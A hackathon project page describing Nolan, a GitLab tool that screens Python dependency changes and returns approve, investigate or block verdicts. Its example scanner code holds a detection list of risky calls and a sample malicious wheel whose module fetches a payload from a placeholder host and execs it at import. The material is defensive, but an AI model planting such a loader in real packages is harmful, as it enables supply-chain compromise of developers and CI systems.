Inspiration
Recent supply-chain attacks showed that the real failure is not just missed malware detection. The real failure is that most teams still have no admission control layer between “dependency declared” and “dependency installed.” We built Nolan to make that admission decision inside the SDLC, at review time, before a poisoned release can spread across developer machines and CI.
What it does
Nolan evaluates changed Python dependencies and issues one of three verdicts: APPROVE, INVESTIGATE, or BLOCK. It inspects provenance, release integrity, artifact behavior, and policy compliance; recommends a safe version; maps blast radius; and generates response artifacts such as a trust receipt, incident dossier, security issue, remediation MR, and HTML trust report.
How we built it
We built Nolan as a GitLab-native product with two surfaces: a public Duo flow and a companion investigator agent. Underneath that, we built a Python trust engine that resolves dependency deltas, expands transitive dependencies, queries PyPI metadata and integrity signals, unpacks wheel artifacts, analyzes Python ASTs for suspicious behavior, evaluates policy from AGENTS.md, and renders machine-readable artifacts that the Duo flow can consume.
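As an added illustration of the wheel-unpacking and AST-analysis step described above (example code written for this page, not Nolan's own engine), the following scans the Python modules inside a wheel for risky calls such as exec or import-time network fetches and folds the findings into one of the three verdicts; the risky-call table and the in-memory sample wheel are assumptions constructed for the example.

```python
import ast, io, zipfile

# Calls worth flagging in package code, mapped to a verdict (simplified heuristic, not Nolan's policy).
RISKY_CALLS = {"exec": "BLOCK", "eval": "BLOCK", "os.system": "BLOCK",
               "subprocess.run": "BLOCK", "subprocess.Popen": "BLOCK", "socket.socket": "INVESTIGATE",
               "urllib.request.urlopen": "INVESTIGATE", "base64.b64decode": "INVESTIGATE"}
SEVERITY = {"APPROVE": 0, "INVESTIGATE": 1, "BLOCK": 2}

def dotted_name(node):
    # Turn a Name/Attribute chain such as urllib.request.urlopen into "a.b.c".
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # call target is some other expression; not matched here

def scan_source(path, source):
    """Yield (path, line, call, verdict) for each risky call in one module."""
    try:
        tree = ast.parse(source, filename=path)
    except SyntaxError:  # unparseable code inside a wheel is itself a reason to look closer
        yield (path, 0, "<unparseable>", "INVESTIGATE")
        return
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in RISKY_CALLS:
                yield (path, node.lineno, name, RISKY_CALLS[name])

def scan_wheel(wheel_bytes):
    """Scan every .py file inside a wheel (a zip); the worst finding sets the verdict."""
    with zipfile.ZipFile(io.BytesIO(wheel_bytes)) as zf:
        findings = [f for name in zf.namelist() if name.endswith(".py")
                    for f in scan_source(name, zf.read(name).decode("utf-8", "replace"))]
    verdict = max((f[3] for f in findings), key=SEVERITY.__getitem__, default="APPROVE")
    return verdict, findings

def build_sample_wheel(include_bad=True):
    # Constructed in-memory wheel: a benign package plus, optionally, one that fetches and executes code at import.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("okpkg/__init__.py", "def add(a, b):\n    return a + b\n")
        if include_bad:
            zf.writestr("badpkg/__init__.py", "import base64, urllib.request\n"
                        "blob = urllib.request.urlopen('http://example.invalid/p').read()\n"
                        "exec(base64.b64decode(blob))\n")
    return buf.getvalue()
```

A real engine would also need to resolve aliased imports (for example `from subprocess import run as r`) and look at package metadata and entry points, which this heuristic deliberately leaves out.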
Challenges we ran into
The hardest part was connecting deterministic security analysis with GitLab Duo in a way that stayed reliable enough for a demo. We had to bridge CI-produced evidence into the flow, handle environments where live CI was restricted, keep evidence-pack demos deterministic without making them fake, and make sure the same evidence model powered reports, GitLab actions, and conversational explanations.
Accomplishments that we're proud of
We’re proud that Nolan is not just a concept or a prompt chain. It performs real wheel inspection, real AST-based behavior analysis, real transitive dependency expansion, and real GitLab-oriented response packaging. We’re also proud that it feels like a product: selective verdicts, trust receipts for clean releases, incident artifacts for dangerous ones, and a polished demo/reporting layer.
What we learned
We learned that dependency trust is a governance problem as much as a detection problem. We also learned that the strongest architecture here is hybrid: deterministic systems should gather evidence and enforce hard rules, while the LLM should explain, summarize, and orchestrate actions instead of pretending to do raw forensics.
What's next for Nolan
Next, we want to publish the flow and agent fully in GitLab AI Catalog, complete the live MR artifact path everywhere, add npm support, improve organization-wide GitLab API exposure scanning, deepen provenance and attestation verification, and turn Nolan from a hackathon project into a production-grade trust layer for software teams.
Built With
- github-releases-api
- gitlab-ai-catalog
- gitlab-ci/cd
- gitlab-duo-agent-platform
- gitlab-rest-api
- html/css
- markdown-artifacts
- packaging
- pypi-integrity-api
- pypi-json-api
- python-3.11
- python-ast-analysis
- urllib
- yaml
- zipfile